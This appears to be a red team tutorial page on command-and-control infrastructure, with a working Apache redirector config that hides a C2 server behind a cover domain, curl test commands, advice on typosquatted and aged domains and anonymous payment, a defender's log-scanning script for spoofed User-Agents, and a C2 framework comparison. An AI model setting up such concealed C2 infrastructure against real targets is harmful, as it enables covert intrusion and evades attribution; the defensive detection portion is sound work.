Red Team Infrastructure

Setup

Professional red team infrastructure includes multiple layers of obfuscation, redundancy, and attribution resistance. Never point beacons directly at your C2 server—use redirectors, domain fronting, and dynamic DNS.

Infrastructure Architecture

infrastructure-diagram.txt
```text
Victim → Redirector → C2 Server → Team Server

┌─────────┐     ┌────────────┐     ┌────────────┐     ┌─────────────┐
│ Beacon  │────▶│ Redirector │────▶│ C2 Server  │────▶│ Team Server │
│ (Target)│     │ (Apache)   │     │ (Covenant) │     │ (Operators) │
└─────────┘     └────────────┘     └────────────┘     └─────────────┘
                      │
                      ▼
                ┌────────────┐
                │ CloudFlare │
                │ CDN        │
                └────────────┘
```

**Why Multiple Layers?**
- If a redirector is burned, only that host is lost; the C2 server behind it stays hidden
- Domain fronting hides the true destination of the traffic
- The team server is never exposed to the internet

Setting Up Redirectors

apache-redirector.conf
```apache
# Apache redirector with mod_rewrite
# Proxies requests carrying the beacon's User-Agent to the C2 server;
# every other request is redirected to a benign site as cover

<VirtualHost *:443>
    ServerName legit-looking-domain.com

    SSLEngine On
    SSLCertificateFile /etc/letsencrypt/live/legit-looking-domain.com/fullchain.pem
    SSLCertificateKeyFile /etc/letsencrypt/live/legit-looking-domain.com/privkey.pem

    # Required for the [P] rule below to proxy to an https:// backend
    SSLProxyEngine On

    # Enable mod_rewrite
    RewriteEngine On

    # Only forward traffic with a specific User-Agent (your beacon)
    RewriteCond %{HTTP_USER_AGENT} "^Mozilla/5\.0.*OneDriveSync.*"
    RewriteRule ^/(.*)$ https://C2-SERVER-IP/$1 [P,L]

    # All other traffic goes to a legitimate website (cover)
    RewriteRule ^/(.*)$ https://google.com/$1 [R=302,L]
</VirtualHost>
```

```bash
# Enable the required modules and restart Apache
sudo a2enmod rewrite ssl proxy proxy_http
sudo systemctl restart apache2

# Test the redirector: a request with the beacon User-Agent should reach the C2
curl -A "Mozilla/5.0 OneDriveSync" https://legit-looking-domain.com

# Any other client should be redirected to Google
curl https://legit-looking-domain.com
```

Domain Acquisition Best Practices

  • Categorization: Register domains weeks in advance and browse benign content from them so they acquire a reputation and a category
  • Aged Domains: Purchase expired domains that already carry trust (NameCheap, GoDaddy auctions)
  • Typosquatting: Register common misspellings of legitimate domains (mircosoft.com, gooogle.com)
  • Privacy Protection: Use WHOIS privacy, cryptocurrency payments, and foreign registrars
  • TLS Certificates: Always use Let's Encrypt for HTTPS; unencrypted C2 traffic stands out

Use Cobalt Strike Malleable Profiles

Customize C2 traffic to mimic legitimate applications such as OneDrive, Microsoft Update, or Google Analytics. Malleable profiles let you define HTTP headers, URI patterns, and even the SSL certificate the listener presents.
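The same traits that make the redirector and malleable-profile setup above work (a beacon whose User-Agent claims to be OneDrive or Windows Update while talking to an unrelated host) are what a defender can key on. The following is an added example, not code from the page: it scans web-proxy log lines for a known-client User-Agent marker whose destination lies outside that vendor's domains. The log format, the sample lines and the marker-to-domain map are constructed and illustrative, not a complete list of vendor endpoints.

```python
"""Flag proxy log entries whose User-Agent claims a known client
(OneDrive, Windows Update) but whose destination is not that vendor's."""
import re
from collections import namedtuple

# Illustrative subset: UA marker -> domains the real client is expected to contact.
# A production list would come from the vendor's published endpoint documentation.
EXPECTED_DOMAINS = {
    "OneDriveSync": ("onedrive.com", "live.com", "sharepoint.com", "microsoft.com"),
    "Windows-Update-Agent": ("windowsupdate.com", "microsoft.com"),
}

# Constructed log layout: <timestamp> <source-ip> <destination-host> "<user-agent>"
LOG_RE = re.compile(r'^(?P<ts>\S+) (?P<src>\S+) (?P<host>\S+) "(?P<ua>[^"]*)"$')

Finding = namedtuple("Finding", "ts src host ua marker")


def domain_matches(host, allowed):
    """True if host equals or is a subdomain of any allowed domain."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in allowed)


def find_ua_mismatches(lines):
    """Return one Finding per line where a UA marker is present but the
    destination host is outside that client's expected domains."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # malformed line: skip rather than crash the sweep
        for marker, allowed in EXPECTED_DOMAINS.items():
            if marker in m["ua"] and not domain_matches(m["host"], allowed):
                findings.append(Finding(m["ts"], m["src"], m["host"], m["ua"], marker))
    return findings


# Constructed sample lines: one benign OneDrive sync, one beacon hiding behind the
# redirector domain from the config above, one browser hit, one fake update agent.
SAMPLE_LOG = [
    '2024-05-01T10:00:00Z 10.0.0.5 onedrive.live.com "Mozilla/5.0 OneDriveSync"',
    '2024-05-01T10:00:05Z 10.0.0.7 legit-looking-domain.com "Mozilla/5.0 (Windows NT 10.0) OneDriveSync"',
    '2024-05-01T10:00:10Z 10.0.0.7 www.google.com "Mozilla/5.0 (Windows NT 10.0) Chrome/120"',
    '2024-05-01T10:00:15Z 10.0.0.9 update.example.net "Windows-Update-Agent/10.0"',
    'garbage line that does not parse',
]

if __name__ == "__main__":
    for f in find_ua_mismatches(SAMPLE_LOG):
        print(f"{f.ts} {f.src} -> {f.host} claims {f.marker}: {f.ua}")
```

Hits are only a starting point: legitimate traffic through an enterprise proxy or CDN can also mismatch, so treat a finding as a pivot for checking domain age, TLS certificate and beaconing cadence rather than as a verdict.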

C2 Frameworks Comparison

| Framework | Cost | Best For |
|---|---|---|
| Cobalt Strike | $5,000/year | Enterprise engagements, malleable profiles |
| Covenant | Free (open-source) | .NET-based operations, PowerShell heavy |
| Mythic | Free (open-source) | Cross-platform, modular agents |
| Sliver | Free (open-source) | Go-based, modern alternative to Cobalt Strike |